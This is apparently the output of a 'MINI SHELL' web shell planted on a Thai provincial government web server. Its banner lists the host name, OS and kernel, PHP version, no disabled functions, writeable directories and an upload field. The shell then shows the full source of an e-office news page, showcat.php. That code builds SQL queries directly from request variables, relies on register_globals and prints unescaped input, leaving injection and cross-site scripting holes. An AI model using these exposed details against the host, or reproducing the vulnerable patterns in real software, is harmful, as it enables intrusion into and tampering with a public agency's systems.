MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/gov_news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/gov_news/showcat.php
<?
session_start();
ob_start();
if ($_SESSION['display']==0) { $appsession = $_SESSION[session_apppermit][6]; } else { $appsession=""; }


//echo "<pre>";
//print_r($appsession);
//exit;

$staffid=$_SESSION['session_staffid'];
$org_id=$_SESSION['session_org'];

//echo "<pre>";
//print_r($_SESSION);

include("var.inc.php");
include("../../config/config.inc.php");
include("../../common/function.php");
require("counter_news.php");
$save_dir =  "../../upload/govnews/"; 	
//insert timeQuery
include("../../common/common_system.inc.php"); 
$ApplicationName="gov_news"; 
$time_start = getmicrotime();  
//insert timeQuery
$arr_img = array("bmp"=>1,"doc"=>1,"gif"=>1,"jpg"=>1,"mdb"=>1, "mpp"=>1,"pdf"=>1,"ppt"=>1,"rar"=>1,"zip"=>1,"xls"=>1); 
				
				
function  randigit($numchar){
	$frchar = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z") ; 
	$ran_digit ="";
	for ($ii = 0 ;   $ii < $numchar ;   $ii++ ){ 
		$ran_digit .= $frchar[rand(1,26)] ; 
	}
	return $ran_digit ; 
} ## END function 

// function for fetch organize name by org_id
function org_name($org_id) {
	$sql1 = "SELECT groupname FROM org_staffgroup WHERE gid='$org_id' ";
	$query1 = mysql_query($sql1) or die(mysql_error());
	$rs = mysql_fetch_assoc($query1);
	return $rs[groupname];
}

$smonth = array("","ม.ค.", "ก.พ.", "มี.ค.", "เม.ย.", "พ.ค.", "มิ.ย.", "ก.ค.", "ส.ค.", "ก.ย.", "ต.ค.", "พ.ย.", "ธ.ค.");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>พรบ. ข้อมูลข่าวสาร</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../common/style.css" type="text/css" rel="stylesheet">
<style type="text/css">
<!--
body {
	margin-left: 4px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: underline;
}
a:active {
	text-decoration: none;
}
.style1 {color: #FFFFFF}
.style2 {color: #000066}
.style3 {color: #006600}
-->
</style>
<script type="text/javascript" src="../../common/popcalendar.js"></script>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="change_kpi_sar.js"></script>
<script type="text/javascript" src="../../common/fckeditor/fckeditor.js"></script>
<script type="text/javascript">
$(document).ready(function(){
	<? if($prop==1) {?>$("#type1").hide(); $("#type2").show(); $("#Submit23").hide();<? } else {?>
	$("#type2").hide(); $("#type1").slideDown(); $("#Submit23").show();<? } ?>
	<? if($rs[expire]!=1) {?>$("#expirex").hide();<? } ?>
	$("input[name='type']").click(function(){
		var value = $("input[name='type']:checked").val();
		if (value==1) { $("#type2").hide(); $("#type1").slideDown(); $("#Submit23").show();  }
		else if (value==2) { $("#type1").hide(); $("#type2").slideDown(); $("#Submit23").hide(); }
	});
	
	$("input[name='expire']").click(function(){
		var value = $("input[name='expire']:checked").val();
		if (value==0) { $("#expirex").slideUp(); }
		else if (value==1) { $("#expirex").slideDown(); }
	});
});
</script>
<body bgcolor="#EFEFFF">
<?
############### หารายชื่อหน่วยงานเก็บใน array 
$sql = " SELECT gid ,groupname  FROM org_staffgroup    ";
$result = mysql_query($sql ) ; 
while ($rsg = mysql_fetch_assoc($result)){
	$arr_gname[$rsg[gid]] = $rsg[groupname] ; 
}############### 
#echo " <hr> <pre>";print_r($arr_gname ) ; 
#echo " <hr> <pre>";print_r($_SESSION ) ; 

if ($cat_id != ""){ 
	$sql = " SELECT   kpi_tree.node_name AS groupname   FROM   kpi_tree_member
	Inner Join kpi_tree ON kpi_tree_member.node_id = kpi_tree.node_id
	WHERE   kpi_id ='$cat_id' "; 
	$row=mysql_fetch_array(mysql_query($sql));
	$gname1 = $row[groupname] ; 
	
	$sql="SELECT kpi_sar.name, kpi_sar.id , kpi_sar.howto  FROM   kpi_sar  WHERE id='$cat_id' ";
	$row=mysql_fetch_array(mysql_query($sql));
	$gname2 = $row[name] ; 	
	$rshowto = $row[howto] ; 	
	$nowsarid = $row[id] ; 	 	
?>
	<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
	  <tr>
		<td>
		<h4> <?=$gname1?> <br>
		&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;   <?=$gname2?>  </h4>
		<?
		if ($rshowto != ""  AND  $session_staffid != "" ){  echo "   <font color = red>  ** $rshowto **</font>  "; } 
		?>	
		</td>
	  </tr>
	</table>
<?
} ############################ if ($cat_id != ""){ 

if  (($sub_id != "") and ($cat_id == ""))  { 
	$sql = " SELECT    kpi_tree.node_name AS groupname,
	 kpi_detail.title,kpi_detail.id,   kpi_detail.detail,kpi_sar.name , kpi_sar.howto  , kpi_sar.id AS sarid 
	FROM  kpi_tree_member
	Inner Join kpi_tree ON kpi_tree_member.node_id = kpi_tree.node_id
	Inner Join kpi_sar ON kpi_tree_member.kpi_id = kpi_sar.id
	Inner Join kpi_detail_member ON kpi_sar.id = kpi_detail_member.id
	Inner Join kpi_detail ON kpi_detail_member.sub_id = kpi_detail.id
	WHERE  kpi_detail.id  ='$sub_id' "; 
	
	$row=mysql_fetch_array(mysql_query($sql));
	$gname1 = $row[groupname] ; 
	$gname2 = $row[name] ; 		
	$nowsarid = $row[sarid] ; 	 

?>
	<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
	  <tr>
		<td>
		<h4>   <?=$gname1?> <br>
		&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;   <?=$gname2?>  </h4>
		</td>
	  </tr>
	</table>
<?
} ############################ if ($sub_id != ""){ 
?>


<?
if ($act=="unhide") {
	$sqlx = "UPDATE kpi_detail SET hide='0' WHERE id='$sub_id'";
	$queryx = mysql_query($sqlx) or die(mysql_error());
	addlog("ยกเลิกระงับการแสดงผล #$sub_id",$varappid,$sub_id,7);
	echo "<center><h2>ยกเลิกระงับการแสดงผลแล้ว</h2></center>";
	echo "<meta http-equiv='Refresh' content='1;URL=$PHP_SELF?cat_id=$cat_id&sub_id=$sub_id'>";
	exit();
} 

if ($_POST) {

if ($act=="hide") {
	$sqlx = "UPDATE kpi_detail SET hide='1', hide_reason='$hide_reason' WHERE id='$sub_id'";
	$queryx = mysql_query($sqlx) or die(mysql_error());
	addlog("ระงับการแสดงผล #$sub_id",$varappid,$sub_id,7);
	echo "<center><h2>ระงับการแสดงผลแล้ว</h2></center>";
	echo "<meta http-equiv='Refresh' content='1;URL=$PHP_SELF?cat_id=$cat_id&sub_id=$sub_id'>";
	exit();
} 

if($type==2 ) { $title=$title2;$detail=$detail2; $index_news=$index_news2;}
$date_end = convert_2mysql($date_end);
$hour = $h_end.":".$m_end.":00";
$date_end = $date_end." ".$hour;
	
$q = mysql_query("show table status from $dbname like 'kpi_detail'") or die(mysql_error()); 
$no = mysql_result($q, 0, 'Auto_increment');
$no=$no;

if($act=="add" && $sub_id =="") {
	$org_id=($session_apppermit[6][10])?$org_select:$org_id;
	$org_id=($org_id)?$org_id:$_SESSION['session_org'];
	$sql = "INSERT INTO kpi_detail(title,detail,hide,staffid,org_id,type,date_start,date_end,expire,index_news  ) VALUES ('$title','$detail','0','$staffid','$org_id','$type',NOW(),'$date_end','$expire','$index_news'   )"; 
	addlog("เพิ่มหัวข้อใหม่ #$no",$varappid,$no,3);
	$query = mysql_query($sql) or die(mysql_error());
	$query = mysql_query("INSERT INTO kpi_detail_member(id,sub_id) VALUES('$cat_id','$no')");	
}else { 
###################### กรณี Edit 
	if ($session_apppermit[6][10])  { 
		$org_id= $org_select   ; 
		$orgupdate_str = " org_id = '$org_id' ,  " ; 
	}else{ $orgupdate_str = "  ";  	
	} ########## END 
	$sql = "UPDATE kpi_detail SET $orgupdate_str   title='$title',  detail='$detail',type='$type',date_end='$date_end',expire='$expire',index_news='$index_news' WHERE id='$sub_id'"; 
	addlog("แก้ไขหัวข้อ #$sub_id",$varappid,$sub_id,4);
	$query = mysql_query($sql) or die(mysql_error());
	$sql_kpi_detail_member = "UPDATE kpi_detail_member SET id='".$_POST["kpi_sar_id"]."'   WHERE sub_id='".$sub_id."'"; 
	$query = mysql_query($sql_kpi_detail_member) or die(mysql_error());

	$no=$sub_id;
}

	if($actx=="step2") {
		header("Location: showcat_attach.php?actx=$actx&action=add&cat_id=$cat_id&sub_id=$no");
	}
	else {
		echo "<center><h2>บันทึกข้อมูลแล้ว</h2></center>";
		echo "<meta http-equiv='Refresh' content='1;URL=$PHP_SELF?cat_id=$cat_id&sub_id=$sub_id'>";
		exit();
	}
}
if ($act=="del") {
	$sqlx = "DELETE FROM kpi_detail WHERE id='$sub_id'";
	$queryx = mysql_query($sqlx) or die(mysql_error());
	$sql_g = "DELETE FROM kpi_detail_member  WHERE id='$cat_id' AND sub_id='$sub_id'";
	mysql_query($sql_g);
	addlog("ลบหัวข้อ #$sub_id",$varappid,$sub_id,5);
	echo "<center><h2>ลบข้อมูลแล้ว</h2></center>";
	echo "<META HTTP-EQUIV='Refresh' CONTENT='1;URL=$PHP_SELF?cat_id=$cat_id&sub_id=$sub_id'>";
	exit();
}

// query for intializing...
if ($sub_id) {
$sql1 = "SELECT * FROM kpi_detail WHERE id='$sub_id' ";
	$query1 = mysql_query($sql1) or die(mysql_error());
	$nrows = mysql_num_rows($query1);
	$rs = mysql_fetch_assoc($query1);
	$arr_rs = $rs ; 
	$temp1 = explode(" ",$rs[date_end]);
	$temp2 = explode(":",$temp1[1]);
	$hh = $temp2[0];
	$mm = $temp2[1];

} ########## if ($sub_id) {

?>

<? if (($act=="add")||($act=="edit")) { ?>

 
<form action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>&sub_id=<?=$sub_id;?>" id="form1" method="post" enctype="multipart/form-data" name="formr">
  <br>
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th width="100%" align="left" bgcolor="#000F77"><span class="style1">รายละเอียด</span></th>
          </tr>
		  <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8"><table width="100%%" border="0" align="center" cellpadding="2" cellspacing="0">

                   <tr>
                     <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">ประเภทข่าว : </td>
                     <td width="80%" align="left" valign="top" bgcolor="#F3F5F8">
						 <input name="type" type="radio" value="1" <? if(!$prop){ ?>checked<? } ?>>ข้อความ
						 <input name="type" type="radio" value="2" <? if($prop){ ?>checked<? } ?>>URL 
					 </td>
                   </tr>
              </table></td>
          </tr>
          <tr>
            <td align="left" valign="top" bgcolor="#F3F5F8">
			
			<div id="type1">
			  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
                <tr>
                  <td align="left" valign="top" bgcolor="#000000"><table width="100%" border="0" align="center" cellpadding="5" cellspacing="1">
                      <tr>
                        <th align="center" valign="top" bgcolor="#CCCCCC">ขั้นตอนที่ 1 จากทั้งหมด 2 ขั้นตอน </th>
                      </tr>
                  </table></td>
                </tr>
              </table>
			  <table width="100%%" border="0" align="center" cellpadding="2" cellspacing="0">
              <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="left" valign="top" bgcolor="#F3F5F8">
			  &nbsp;<input name="title" type="text" id="title" style="width:98%;" value="<?=$rs[title];?>"></td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">รายละเอียด : </td>
            <td align="center" valign="top" bgcolor="#F3F5F8">
			  <textarea name="detail" id="detail" style="width:98%; height:100px;"><?=$rs[detail];?></textarea></td>
          </tr>
		   <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">ดัชนีข่าวสาร : </td>
            <td align="center" valign="top" bgcolor="#F3F5F8">
			  <input name="index_news" id="index_news" style="width:98%;" value="<?=$rs[index_news];?>"></td>
          </tr>
            </table>
			</div>
			
			<div id="type2">
			  <table width="100%%" border="0" align="center" cellpadding="2" cellspacing="0">
              <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="center" valign="top" bgcolor="#F3F5F8"><input name="title2" type="text" id="title2" style="width:98%;" value="<?=$rs[title];?>"></td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">URL : </td>
            <td align="center" valign="top" bgcolor="#F3F5F8">
				<input name="detail2" type="text" id="detail2" style="width:98%;" value="<?=$rs[detail];?>"></td>
          </tr>
		   <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">ดัชนีข่าวสาร : </td>
            <td align="center" valign="top" bgcolor="#F3F5F8">
			  <input name="index_news2" id="index_news2" style="width:98%;" value="<?=$rs[index_news];?>"></td>
          </tr>
            </table>
			<br/>
			</div>
			
			 <?php
		  	$sql_sar = "SELECT kpi_sar.id, kpi_sar.name, kpi_tree.node_id,
			kpi_tree.node_name
			FROM
			kpi_tree_member
			Inner Join kpi_sar ON kpi_sar.id = kpi_tree_member.kpi_id
			Inner Join kpi_tree ON kpi_tree_member.node_id = kpi_tree.node_id
			Inner Join kpi_detail_member ON kpi_sar.id = kpi_detail_member.id
			where kpi_detail_member.sub_id = '".$_GET['sub_id']."' ";
			$query_sar = mysql_query($sql_sar) or die(mysql_error());
			$rs_sel = mysql_fetch_assoc($query_sar);
		  ?>
		  <table width="100%">
		    <tr>
                <td align="right"  width="20%" valign="middle" bgcolor="#F3F5F8">หมวดข้อมูล (มาตรา)</td>
                <td align="left" valign="middle" bgcolor="#F3F5F8">
				<select name="kpi_tree" id="kpi_tree"  onChange="getDataTreeSar('kpi_sar_id',this.value);">
					<OPTION value="">เลือกหมวดข้อมูล</OPTION>
					<? 
					$sql_tree = "SELECT * FROM `kpi_tree`";
					$query_tree = mysql_query($sql_tree) or die(mysql_error());
					while($rs_tree=mysql_fetch_assoc($query_tree)){
					?>
					<option value="<?=$rs_tree["node_id"]?>" <? if($rs_sel["node_id"] == $rs_tree["node_id"]){ echo "selected";}?>><?=$rs_tree["node_name"]?></option>
                	<? } ?>
				</select>
                </td>
              </tr>
			  <tr>
                <td align="right" valign="middle" bgcolor="#F3F5F8">หัวข้อ (วรรค)</td>
                <td align="left" valign="middle" bgcolor="#F3F5F8">
				<LABEL id="kpi_sar_id">
				<select name="kpi_sar_id" id="kpi_sar_id"  >
					<OPTION value="">เลือกหัวข้อ</OPTION>
					<?php
					if($rs_sel["node_id"]){
						$sql_kpi_tree="SELECT kpi_sar.id, kpi_sar.name 
						FROM kpi_tree_member Inner Join 
						kpi_sar ON kpi_sar.id = kpi_tree_member.kpi_id
						WHERE kpi_tree_member.node_id='".intval($rs_sel["node_id"])."' ";
						$query_kpi_tree = mysql_query($sql_kpi_tree) or die(mysql_error());
						while($rs_kpi_tree=mysql_fetch_assoc($query_kpi_tree)){
				?>
				<option value="<?=$rs_kpi_tree["id"]?>"  <? if($rs_sel["id"] == $rs_kpi_tree["id"]){ echo "selected";}?>><?=$rs_kpi_tree["name"]?></option>
				 <?php 
						} 
					}
				?>
				</select>
				</LABEL>
                </td>
              </tr>
			  </table>
			  
			</td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8"><table width="100%%" border="0" align="center" cellpadding="2" cellspacing="0">
			<? if($session_apppermit[6][10]){?>
              <tr>
                <td align="right" valign="middle" bgcolor="#F3F5F8">หน่วยงานเจ้าของข้อมูล</td>
                <td align="left" valign="middle" bgcolor="#F3F5F8">
				<select name="org_select">		
					<? 
					$sqlx="SELECT * FROM `org_staffgroup`";
					$queryx = mysql_query($sqlx) or die(mysql_error());
					while($rs_org=mysql_fetch_assoc($queryx)){
					?>
					<option value="<?=$rs_org[gid]?>" <? if($rs[org_id]==$rs_org[gid]){ echo "selected";}?>><?=$rs_org[groupname]?></option>
                	<? } ?>
				</select>
                </td>
              </tr>
			  <? } ?>
              <tr>
                <td width="20%" align="right" valign="middle" bgcolor="#F3F5F8">&nbsp;</td>
                <td width="80%" align="left" valign="middle" bgcolor="#F3F5F8">
					<input name="expire" type="radio" value="0" <? if((!$rs[expire])||($rs[expire]==0)) {?>checked<? } ?>>ไม่กำหนดวันหมดอายุ
				  <input name="expire" type="radio" value="1" <? if($rs[expire]==1) {?>checked<? } ?>>กำหนดวันหมดอายุ				 </td>
              </tr>

            </table>
			<div id="expirex">
              <table width="100%%" border="0" align="center" cellpadding="2" cellspacing="0">
			  
              <tr>
                <td width="20%" align="right" valign="middle" bgcolor="#F3F5F8">วันหมดอายุ :</td>
                <td width="80%" align="left" valign="middle" bgcolor="#F3F5F8">
				<? if($rs[date_end]!="") { 
						if($rs[date_end]!="0000-00-00 00:00:00") { 
							$datex=$rs[date_end]; 
						} else { $datex=date("Y-m-d h:m:s"); }
					} else { $datex=date("Y-m-d h:m:s"); }
						?>
					<input name="date_end" type="text" value="<?=convert2th(convert_mysql2carendar(substr($datex,0,10)));?>" size="15" readonly>
					<input name="button" type="button" class="index2" style='font-size:11px; width:80px;' onClick="popUpCalendar(this, form.date_end, 'd/m/yyyy')" value='ปีเดือนวัน'>
                  <input type="button" name="btnC1" value="ล้างค่าปฏิทิน" onClick="document.form1.date_end.value='';"></td>
              </tr>
              <tr>
                <td align="right" valign="middle" bgcolor="#F3F5F8">เวลาหมดอายุ : </td>
                <td align="left" valign="middle" bgcolor="#F3F5F8">นาฬิกา&nbsp;
                  <select name="h_end" >
                    <?
			for ($i=0;$i<=23;$i++){
				//if ((intval($h_et)== $i) or (intval($h_end) == $i)){
				if ($hh==$i) { 
					echo "<option value='".sprintf("%02d",$i)."' SELECTED>" .  sprintf("%02d",$i) . "</option>\n";
				}elseif ($i==18) { 
					echo "<option value='".sprintf("%02d",$i)."' SELECTED>" .  sprintf("%02d",$i) . "</option>\n";
				}else{
					echo "<option value='".sprintf("%02d",$i)."'>" .  sprintf("%02d",$i) . "</option>\n";
				}
			}
			?>
                  </select>
นาที&nbsp; 
<select name="m_end" >
  			<?
			for ($i=0;$i<=59;$i++){
				if ($mm==$i) { 
					echo "<option value='".sprintf("%02d",$i)."' SELECTED>" .  sprintf("%02d",$i) . "</option>\n";
				}else{
					echo "<option value='".sprintf("%02d",$i)."'>" .  sprintf("%02d",$i) . "</option>\n";
				}
						}
					?>
</select></td>
              </tr>
            </table>
			</div>
			</td>
          </tr>
          <tr>
            <td align="center" valign="top" bgcolor="#F3F5F8">		
			<input name="act" type="hidden" id="act" value="<?=$act;?>">
              <input name="Submit23" id="Submit23" type="submit" class="epm_button" value="ขั้นตอนที่ 2 แนบไฟล์" onClick="document.form1.action='<?=$PHP_SELF;?>?actx=step2&cat_id=<?=$cat_id;?>&sub_id=<?=$sub_id;?>';">
			  <input name="Submit2" type="submit" class="epm_button" value=" บันทึก ">
		    <input name="Submit22" type="button" class="epm_button" value="     กลับ     " onClick="window.location='<?=$PHP_SELF;?>?cat_id=<?=$cat_id?>';"></td>
          </tr>
      </table>
	  </td>
    </tr>
  </table>
</form>
<br/>
<? } else if ($act=="hide") { ?>
<form action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>" method="post" enctype="multipart/form-data" name="form<?=$cat_id;?><?=$rs[id];?>">
  <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th colspan="2" align="left" bgcolor="#000F77"><span class="style1">ระงับการแสดงผล</span></th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">เหตุผล : </td>
            <td width="80%" align="left" valign="top" bgcolor="#F3F5F8"><textarea name="hide_reason" cols="50" rows="5" id="hide_reason"></textarea></td>
          </tr>
          <tr>
            <td colspan="2" align="center" valign="top" bgcolor="#F3F5F8">
			  <input name="act" type="hidden" id="act" value="<?=$act;?>">
			  <input name="Submit2" type="submit" class="epm_button" value="จัดเก็บข้อมูล">
		    <input name="Submit22" type="button" class="epm_button" value="     ยกเลิก     " onClick="window.location='<?=$PHP_SELF;?>?cat_id=<?=$cat_id?>';"></td>
          </tr>
      </table>
	  </td>
    </tr>
  </table>
</form>
<br/>
<? } else if ($act=="view") { 
addlog("รายการหัวข้อ #$sub_id $arr_rs[title]",$varappid,$arr_rs[id],1);
counter_news($arr_rs[id]);  //  counter_news.php

# echo " <hr> ชนิด <br> $rs[type] ==========  <pre> ";    print_r($arr_rs) ;   echo " </pre>";
?>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
<tr>
      <td>
	  <table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
	  <? if($arr_rs[type]==1) { ?>
          <tr>
            <th colspan="2" align="left" bgcolor="#000F77"><span class="style1">รายละเอียด</span></th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="left" valign="top" bgcolor="#F3F5F8"><?=$arr_rs[title];?></td>
          </tr>
		  <? } ?>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">
			<? if($arr_rs[type]==1) { ?>รายละเอียด : <? } else { ?>URL : <? } ?></td>
            <td width="80%" valign="top" bgcolor="#F3F5F8">
				<? if($arr_rs[type]==1) { ?>
					<?=eregi_replace("\n","",eregi_replace(chr(13),"",$arr_rs[detail]));?>
				<? } else { ?><a href="<?=$arr_rs[detail];?>" target="_blank"><?=$arr_rs[title];?></a><? } ?>			</td>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">วันที่เพิ่มข่าวสาร :</td>
            <td width="80%" valign="top" bgcolor="#F3F5F8">
            <?

				
                $dte = explode(" ",$arr_rs["date_start"]);
                $dte1 =explode("-",$dte[0]);
				$xmm = (int)$dte1[1]  ; $xmm1 = $smonth[$xmm]  ;  
                $dte1= $dte1[2]." ".$xmm1   ." ".($dte1[0]+543);
                echo $dte1." ".$dte[1];
				
				if ($arr_rs["expire"] == 1 ){   
					$dte = explode(" ",$arr_rs["date_end"]);
					$dte1 =explode("-",$dte[0]);
					$xmm = (int)$dte1[1]  ; $xmm1 = $smonth[$xmm]  ;  
					$dte1= $dte1[2]." ".$xmm1  ." ".($dte1[0]+543);
					echo "[วันครบกำหนดแสดงผลข่าว: ";
					echo $dte1." ".$dte[1];				
					echo "]";
				}########## END if ($rs["expire"] == 1 ){ 
			
            ?>
            </td>
          </tr>
		  <? if($arr_rs[type]==1) { ?>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">ไฟล์แนบ : </td>
            <td width="80%" align="left" valign="top" bgcolor="#F3F5F8">
			<?
			$i=1;
			$sql = "SELECT * FROM kpi_detail_file WHERE id='$sub_id' ORDER BY no ASC";
			$result = mysql_query($sql)or die("Query line " . __LINE__ . " Error<hr>".mysql_error());
			while ($rs = mysql_fetch_assoc($result)) {
			
			
				$xtypefile = $rs[typefile] ; 
				if ($arr_img[$xtypefile] ==1 ){
					$ext_url  ="<img src='../../images/icon_$xtypefile.png' width='16' height='16' border=0>	";
				 }else{
					$ext_url  ="<img src='../../images/attach16.gif' width='16' height='16' border=0>		";
				} ########if ($arr_img[$xtypefile] ==1 ){  
				
				
			?><a href="download.php?file=<?=$rs[filename]?>" target="_blank"> <?=$i;?>.&nbsp;<? if($rs[detail]){echo " $ext_url $rs[detail]";}else{ echo "ไฟล์แนบ";}?></a><br/>
			<? $i++; } ?>
			</td>
          </tr>
		  <? }  ## if($rs[type]==1) {   ?>
      </table>
	  </td>
  </tr>
</table>
<br/>
<? } else { 
############### หารายชื่อหน่วยงานเก็บใน array 
$sql = " SELECT gid ,groupname  FROM org_staffgroup    ";
$result = mysql_query($sql ) ; 
while ($rs = mysql_fetch_assoc($result)){
	$arr_gname[$rs[gid]] = $rs[groupname] ; 
}############### 
#echo " <hr> <pre>";print_r($arr_gname ) ;

?>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000" >
  <tr>
    <td align="left" valign="middle"><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#F3F5F8">
      <tr>
        <td <? if (($appsession[10] == "on" )||($appsession[100] == "on")||($appsession[300] == "on")){ ?>colspan="3"<? } else { ?>colspan="2"<? } ?> align="left" ><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <th width="80%" align="left">
			  รายการหัวข้อทั้งหมด              </th>
              <th width="20%" align="right"> <? if ($appsession[300] == "on"){ ?>
                  <a href="<?=$PHP_SELF;?>?act=add&cat_id=<?=$cat_id;?>"> เพิ่มหัวข้อใหม่ </a>
                <? } ?>

                &nbsp;</th>
            </tr>
        </table></td>
      </tr>
      <?

	  	if (($appsession[300] == "on" )||($appsession[100] == "on" )||($appsession[10] == "on" )||$appsession[10]==""){ $jsql =""; } else { $jsql = " AND hide<>'1'"; }
		if ($appsession) {
			if ($appsession[300] == "on" or $appsession[10]||$appsession[10]=="") {  $asql = "";  } else {$asql = " AND staffid='$staffid'";}
		} else { }
		
		if ($gid!="") { 
		$extension=" AND org_id='$gid'"; 
		}else{
		$extension=($_SESSION[temp_gid]!="")?"AND kpi_detail.org_id = '".$_SESSION[temp_gid]."'":"";
		}
		//echo $appsession[10]."ddd";
		addlog("รายการหัวข้อทั้งหมด (cat_id = $cat_id)",$varappid,$cat_id,6);
		$sql1x = "SELECT * , kpi_sar.name AS sarname FROM kpi_detail 
		
		left JOIN kpi_detail_member ON sub_id = kpi_detail.id 
		Inner Join kpi_sar ON kpi_detail_member.id = kpi_sar.id
		
		WHERE kpi_detail_member.id = '$cat_id'  $extension order by date_start desc  ";
		$query1x = mysql_query($sql1x) or die(mysql_error());
		$counter=1;
		echo " <!-----asdf----- $sql1x  ----->   ";
#		echo "   $sql1x     ";		
		while($rsx = mysql_fetch_assoc($query1x)) {
#		echo "  <hr> $rsx[sarname]      ";	
		if ($rsx[sarname] != ""){ $rs_group = trim($rsx[sarname]) ;  } else{ $rs_group = "ไม่ระบุ";    } 
		if ($rs_group == "") { $rs_group = "ไม่ระบุ"; } 				
		$sql1 = "SELECT * FROM kpi_detail WHERE id='$rsx[sub_id]'".$jsql.$asql.$gsql;
#		echo $sql1,'<br />';
		$query1 = mysql_query($sql1) or die(mysql_error());
		while($rs = mysql_fetch_assoc($query1)) {
			$ext_url =  ""; 
			/*$detail				$date_start*/
			$detail1 = $rs[detail]  ; 
			if (strlen($detail1) > 200 ){
				$detail = substr($detail1,0,200) ."..." ; 
			}else{
				$detail = $detail1 ; 
			} ########### END if (strlen($detail1) > 125 ){
			
			$date_start = $rs[date_start]  ; 
			#if ($date_start != ""){ $ext_url  .=  "<br>" .$date_start;  }
			if ($detail != ""){ $ext_url  .=  "<br>" .$detail  ."<br>";    }

			$sql2 = "SELECT  id,no,filename,detail,typefile  FROM kpi_detail_file WHERE id = '$rs[id]' "; 
			$result2 = mysql_query($sql2); 
			$i=1; 
			while ($rs2 = mysql_fetch_assoc($result2)){
				 $ext_url  .= " <br>&nbsp; &nbsp; <span class='style3'>$i</span>";
				 $ext_url  .= " <a href='download.php?file=$rs2[filename]' target='_blank'><span class='style3'>";


				$xtypefile = $rs2[typefile] ; 
				if ($arr_img[$xtypefile] ==1 ){
					$ext_url  .="<img src='../../images/icon_$xtypefile.png' width='16' height='16' border=0>	";
				 }else{   
					$ext_url  .="<img src='../../images/attach16.gif' width='16' height='16' border=0>		";
				} ########if ($arr_img[$xtypefile] ==1 ){  
 		 
				  if($rs2[detail]){  $ext_url  .="$rs2[detail]";}else{   $ext_url  .="ไฟล์แนบ";}
				  $ext_url  .= " </span></a>"; $i++;
			}
			if ($ext_url != ""){ $ext_url  .=   "<br><br><br>";    }		
			if (($appsession[100] == "on" )||($appsession[300] == "on" ) || ($appsession[10] == "on")){ 
?>




      <tr>
        <td width="5%" height="8" align="center" valign="top" bgcolor="#F3F5F8"><span class="style2"><?=$counter;?></span></td>
        <td width="83%" align="left" valign="middle" bgcolor="#F3F5F8"><strong>
					<strong>หน่วยงาน : <?=$arr_gname[$rs[org_id]]?> </strong>					
					<br><strong>หมวด :  <?=$rs_group?></strong>		
					<br><strong>ดัชนีข่าว : <?=$rs[index_news] ?></strong>							
					<br><strong>หัวข้อข่าว : </strong>		
          <? 
		if ($rs[type]==1) {    ############# หน่วยงาน
				if($rs[hide]==1){ ?>
          <img src="../../images/icon_exit.gif" alt="รายการนี้ไม่แสดงผลต่อสาธารณะ" width="13" height="13" border="0" />&nbsp;
          <? } ?>
          <a href="showcat.php?act=view&cat_id=<?=$cat_id;?>&sub_id=<?=$rs[id];?>"><span class="style2">
          <?=$rs[title];?>
          </span></a>
          <?=$ext_url?>
          <? } elseif($rs[type]==2){  ############# ประชาชน
				if($rs[hide]==1){ ?>
          <img src="../../images/icon_exit.gif" alt="รายการนี้ไม่แสดงผลต่อสาธารณะ" width="13" height="13" border="0" />&nbsp;
          <? } ?>
          <a href="<?=$rs[detail];?>" target="_blank">
            <?=$rs[title];?>
          </a>
          <?=$ext_url?>
          <? } ?>
          </strong> <br/>
          <i>
            <? # org_name($rs[org_id]);?>
          </i> </td>
